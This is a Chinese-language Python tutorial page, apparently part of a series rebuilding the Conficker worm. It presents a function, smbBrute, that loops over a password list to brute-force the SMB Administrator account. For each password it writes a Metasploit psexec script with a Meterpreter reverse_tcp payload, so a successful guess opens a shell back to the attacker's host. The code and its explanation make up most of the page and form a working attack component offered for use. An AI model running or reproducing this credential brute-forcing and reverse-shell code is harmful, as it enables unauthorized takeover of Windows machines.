程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
您现在的位置: 程式師世界 >> 編程語言 >  >> 更多編程語言 >> Python

【Python腳本進階】2.4、conficker蠕蟲(下):暴破口令,遠程執行進程

編輯:Python

目錄

一、簡介

分析:

二、實現

利用:


一、簡介

分析:

盡管能成功地在被黑的主機上運行ms08 _ 067 netapi漏洞利用代碼, 但防衛者也能很方便地通過安裝最新的安全補丁來阻止漏洞利用代碼被執行。


因此, 腳本還需要另一種也在Conficker蠕蟲中使用過的攻擊方法。它需要用暴力攻擊的方式破解SMB用戶名/密碼, 以此獲取權限在目標主機上遠程執行 一個進程(psexec)。



二、實現

利用:

輸入smbBurte函數的參數有: Metasploit腳本文件、目標主機、包含密碼列表的另一個文件, 以及本機地址和端口


將用戶名設為Windows的默認管理員administrator, 然後打開密碼列表文件。對文件中的每個密碼, 函數都會生成一個用來遠程執行(psexec)進程的Metasploit腳本。如果某個用戶名/密碼對正確,遠程執行進程的代碼就會運行回連一個命令行shell到攻擊者本機地址及對應的端口。

def smbBrute(configFile, tgtHost, passwdFile, lhost, lport):
username = 'Administrator'
pF = open( passwdFile, 'r' )
for password in pF.readlines():
password = password.strip('\n').strip('\r')
configFile.write('use exploit/windows/smb/psexec\n')
configFile.write('set SMBUser ' + str(username) + '\n')
configFile.write('set SMBPass ' + str(password) + '\n')
configFile.write('set RHOST ' + str(tgtHost) + '\n')
configFile.write('set PAYLOAD ' + 'windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')


  1. 上一篇文章:
  2. 下一篇文章:
Copyright © 程式師世界 All Rights Reserved